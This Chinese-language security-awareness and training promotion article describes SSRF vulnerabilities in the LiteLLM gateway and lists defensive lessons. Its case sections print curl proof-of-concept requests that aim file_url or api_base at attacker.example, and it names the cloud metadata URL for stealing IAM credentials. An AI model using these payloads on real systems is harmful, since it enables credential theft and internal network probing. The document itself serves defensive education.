头脑风暴·想象力激荡
想象一下,公司内部的AI模型代理如同一位勤劳的快递员,日夜奔波于内部系统与外部云服务之间。它的职责是把业务请求“装进包裹”,送到OpenAI、Anthropic、Bedrock等远方的模型提供者,再把答案带回。若这位快递员的背包被人悄悄改装,竟可以让任何人写下“请把这封信送到 169.254.169.254”,结果呢?内部机密、云平台凭证、甚至企业核心业务,都可能在不经意间泄露。
下面通过四个典型案例,从真实的SSRF漏洞、错误的安全门禁设计、权限误用到被忽视的内部日志泄露,层层剥开“看似安全”背后的薄弱环节,帮助大家在脑海中形成鲜活的风险画面。
案例一:任意用户即可触发的盲SSRF——/v1/rag/ingest 接口
背景
LiteLLM 作为 LLM 网关,提供 RAG(Retrieval‑Augmented Generation)功能。业务方只需向 /v1/rag/ingest 提交 file_url,系统便会自行下载文件并进行向量化处理。
漏洞复现
- 任意拥有普通 API Key 的用户(非管理员)直接 POST:
curl -X POST https://<lite‑llm>/v1/rag/ingest \ -H "Authorization: Bearer <user‑key>" \ -H "Content-Type: application/json" \ -d '{ "file_url": "http://attacker.example/evil.txt", "ingest_options": {"vector_store": {"custom_llm_provider": "openai"}} }'- LiteLLM 立刻调用
httpx发起 GET 请求,目标指向攻击者服务器。攻击者的监听日志里出现:
[10/Apr/2026 18:49:21] "GET /evil.txt HTTP/1.1" 200 -关键点:代码在 litellm/rag/ingestion/base_ingestion.py 直接 await http_client.get(file_url),没有任何 URL 白名单、协议校验或域名解析限制。
风险评估
- 云元数据窃取:将
file_url改为http://169.254.169.254/latest/meta-data/iam/security-credentials/,若部署在 AWS、Azure、GCP 任意云平台,即可获取实例角色凭证,实现 云凭证横向移动。 - 内部服务探测:利用
127.0.0.1:6379、127.0.0.1:5432、Kubernetes API (https://10.96.0.1) 等地址,可直接对内部关键服务进行探测或尝试未授权访问。 - 安全边界失效:本应通过 “普通用户只能执行业务逻辑” 的授权模型,却因为 “任意外部请求” 成为攻击通道。
案例二:安全门禁绕过的 SSRF——/search_tools/test_connection(管理员专属)
背景
在一次社区 bounty(编号 4001e1a2‑7b7a‑4776‑a3ae‑e6692ec3d997)中,开发者为 api_base 参数加入了 allow_client_side_credentials 防护,阻止用户自定义后端地址。该防护通过 auth_utils.is_request_body_safe() 检查请求体顶层键名。
漏洞细节
- 原防护只检查 顶层 的
api_base、base_url。然而search_tools/test_connection的请求体结构是:
{ "litellm_params": { "api_base": "https://attacker.example/search", "search_provider": "tavily", "model": "openai/test", "api_key": "test" }}api_base被 嵌套 在litellm_params中,防护函数视而不见,直接走到搜索提供商的连接测试代码,向攻击者控制的 URL 发起请求。
实际利用
- 攻击者需持有 管理员 API Key(在很多公司内部,管理员 key 常用于 CI/CD、内部监控脚本),便可触发:
curl -X POST https://<lite‑llm>/search_tools/test_connection \ -H "Authorization: Bearer <admin‑key>" \ -H "Content-Type: application/json" \ -d '{ "litellm_params": { "api_base": "http://attacker.example/ssrf", "search_provider":"tavily","model":"openai/test","api_key":"test"}}'- 结果:LiteLLM 向
http://attacker.example/ssrf发起 GET,攻击者成功收到请求。
风险评估
- 门禁失效:本是专门为防止 SSRF 设计的 gate,因 结构化请求体 与 硬编码的检查逻辑 不匹配而“自毁”。
- 特权滥用:管理员凭证本应用于系统配置,若泄漏或被内部恶意员工获取,即可利用此通道对内部网络进行 纵向渗透。
- 安全补丁信任危机:一次修复在其他入口未同步,导致“补丁不完整”的安全误区。
案例三:全读 SSRF——/health/test_connection(最高权限)
背景
/health/test_connection 被设计为健康检查接口,允许管理员验证外部模型的可达性。它同样接受 api_base,并将请求转发为 POST /chat/completions。
漏洞要点
- 与案例二相同的 嵌套字段检查缺失,导致 admin key 可直接控制
api_base。 - 与前两个不同的是 返回体完整转发:LiteLLM 将上游服务的 HTTP 响应(包括状态码、Headers、Body)原封不动返回给调用者。
利用示例
curl -X POST https://<lite‑llm>/health/test_connection \ -H "Authorization: Bearer <admin‑key>" \ -H "Content-Type: application/json" \ -d '{"litellm_params":{"api_base":"http://internal.service.local/secret","model":"openai/test","api_key":"test"}}'- 返回结果中会出现 internal.service.local 的错误页面、HTML、甚至业务数据(如果该服务返回 200 并带有敏感 JSON),相当于 内部服务信息泄露。
风险评估
- 内部信息泄露:攻击者可以利用此 “全读” 能力,枚举内部 API、读取错误信息、获取版本号、甚至抓取业务数据。
- 侧信道利用:通过差异化的返回体大小、响应时间,进一步推断内部系统的运行状态。
- 权限聚合:虽然只有 PROXY_ADMIN 才能调用,但在大型组织里,admin key 常被写入脚本、CI/CD pipelines,泄漏概率不容忽视。
案例四:现实中的 AI 代理失误——Copy Fail (CVE‑2026‑31431) 与企业内部代码泄漏
背景
2026 年 4 月,Linux 内核出现了高危漏洞 Copy Fail (CVE‑2026‑31431),攻击者利用内核的复制机制实现特权提升。与此同时,众多企业在部署 AI 代理(如 LiteLLM)时,往往直接把 源码、配置文件、API 密钥 通过容器镜像或 Git 仓库公开,形成 代码泄漏。
关联分析
- SSRF 与内核特权提升的叠加:攻击者先利用 SSRF 读取实例元数据获取云凭证,再使用此凭证在受影响的 EC2 实例上执行本地提权脚本,触发 CVE‑2026‑31431,实现 云端到实例的完整链路。
- 供应链风险:AI 代理的 Dockerfile 常在
RUN pip install litellm==0.12.0之后直接拷贝config.yaml,若未对镜像进行 Vuln‑scan 与 秘密扫描,攻击者可以直接在公开的镜像仓库抓取 api_key,配合 SSRF 读取云元数据,实现 横向跨云租户攻击。
教训
- 安全门禁必须与业务模型匹配:仅检测顶层字段不足以防止深层嵌套的恶意输入。
- 最小特权原则:管理员凭证不应被硬编码在容器镜像或 CI 脚本中。
- 供应链安全:所有第三方镜像、依赖库、配置文件均需进行 Secrets Detection 与 SCA(软件组成分析)。
综合分析:从“技术细节”到“安全思维”
| 关键要点 | 对应案例 | 反思与对策 |
|---|---|---|
| 输入验证不彻底 | 案例1、2、3 | 采用 白名单 + 正则 检查 URL,禁止内网 IP、元数据地址;统一在 请求解析层 实施深度检查。 |
| 安全门禁设计不匹配 | 案例2、3 | 防护逻辑应 递归检查 所有层级字段;使用 Schema‑Driven 验证(如 OpenAPI‑validator)统一约束。 |
| 特权滥用 | 案例2、3、4 | 实行 角色最小化,仅在必要时授予管理员 token;对 admin token 实行 硬件安全模块(HSM) 管理或 短期一次性凭证。 |
| 供应链与配置泄漏 | 案例4 | CI/CD 加入 Secrets Scanner(GitLeaks、TruffleHog),镜像发布前运行 SBOM 与 Vuln Scan。 |
| 云环境特有风险 | 案例1、4 | 在 VPC、云防火墙层面 阻断实例元数据端口 对外访问;开启 IMDSv2 并强制使用 session token。 |
以上表格展示的并非孤立的“技术漏洞”,而是 安全思维缺失 的具体表现。在数字化、数智化、具身智能深度融合的今天,AI 代理、云原生平台、容器化部署 已成企业核心业务的血脉。一旦链路中的任一环节出现失误,攻击者就能像拼图一样快速拼凑出 全链路攻击路径。
走向未来:在具身智能化、数智化、数据化交织的环境中,如何让每位员工成为“安全第一线”
- 认知层面——安全即业务
- “安全不是 IT 的事,而是每个人的事”。正如古语“防微杜渐”,任何一次看似微不足道的请求(一次普通的文件上传、一条随意的 API 调用),都有可能成为攻击者的入口。
- 案例复盘:想象一下,如果某位同事在测试 RAG 功能时不经意输入了
http://169.254.169.254/latest/meta-data/,系统立刻泄露了云凭证,导致整条业务链路被劫持——这不再是 “技术团队的失误”,而是 全公司运作的瘫痪。
- 技能层面——从“会用”到“会防”
- 安全编码:学习 输入白名单、正则过滤与 异常捕获 的最佳实践;在提交代码前使用 静态代码分析工具(如 Bandit、SonarQube)捕获潜在 SSRF 风险。
- 安全审计:掌握 日志审计 与 异常检测,例如对外发请求的 User‑Agent、目标 IP、响应时长 进行基线比对,一旦发现异常立即告警。
- 云安全:了解 IMDSv2、安全组、网络访问控制列表(ACL) 的配置细节,学会在 Terraform / CloudFormation 中写入 最小化的 egress 策略。
- 文化层面——安全是一种自觉
- 安全演练:定期组织 红蓝对抗赛,让开发、运维、业务团队共同参与,体会攻击者的视角。
- 知识共享:每月一次的 Security Lunch‑&‑Learn,分享近期漏洞(如本篇的 SSRF 案例)与防御经验,形成 知识闭环。
- 激励机制:对在代码审计、漏洞报告中表现突出的同事给予 安全积分、奖励,让安全表现可视化、可量化。
- 工具层面——让安全自动化成为日常
- CI/CD 集成:在每次代码提交、镜像构建时跑 OWASP Dependency‑Check、GitLeaks、Snyk,自动阻止含有敏感信息或高危依赖的产出。
- 运行时防护:部署 Web Application Firewall (WAF) 与 Runtime Application Self‑Protection (RASP),对可疑的 outbound 请求进行二次校验。
- 可观测性:使用 OpenTelemetry 收集跨服务的请求链路,统一在 Grafana 或 Kibana 中展示,异常时快速定位是哪一层被滥用。
号召:加入“信息安全意识培训”,共筑数智化安全防线
时间:2026 年 5 月 15 日(周一)至 5 月 21 日(周日)
形式:线上直播 + 线下小组互动,配套 实战实验室(包括 LiteLLM SSRF 漏洞复现、云元数据读取防护、Docker 镜像安全扫描等)
对象:全体员工(研发、运维、产品、业务、财务均可参加)
收益:
– 获得 《企业AI安全防护手册》(内部版)电子书;
– 完成培训即颁发 信息安全合规证书,可在内部系统中获得 安全积分 加成;
– 通过实战实验室,可在 CTF 赛道 中争夺 “安全先锋” 奖杯,价值 3000 元的安全工具礼包。
亲爱的同事们,在具身智能、数智化、数据化的浪潮里,AI 代理不再是黑盒,而是 安全审计的焦点。我们每个人都是这条防线的节点,只有把 技术细节 与 安全意识 同步提升,才能让企业在数字化转型的道路上保持 “稳如磐石”。请大家积极报名,携手把“信息安全”写进每一天的工作流程,用知识和行动为企业护航!
温馨提示:报名链接已在公司内部邮件、企业微信以及 安全门户 同步推送,点击即入门。若有任何疑问,可随时联系信息安全部朱老师(内线 8602)或安全培训负责人王工(邮箱 [email protected])。
让我们一起在 “技术驱动业务,安全守护未来” 的信条下,迈出坚实的一步——从今天的学习开始。
在昆明亭长朗然科技有限公司,信息保护和合规意识是同等重要的两个方面。我们通过提供一站式服务来帮助客户在这两方面取得平衡并实现最优化表现。如果您需要相关培训或咨询,欢迎与我们联系。
- 电话:0871-67122372
- 微信、手机:18206751343
- 邮件:info@securemymind.com
- QQ: 1767022898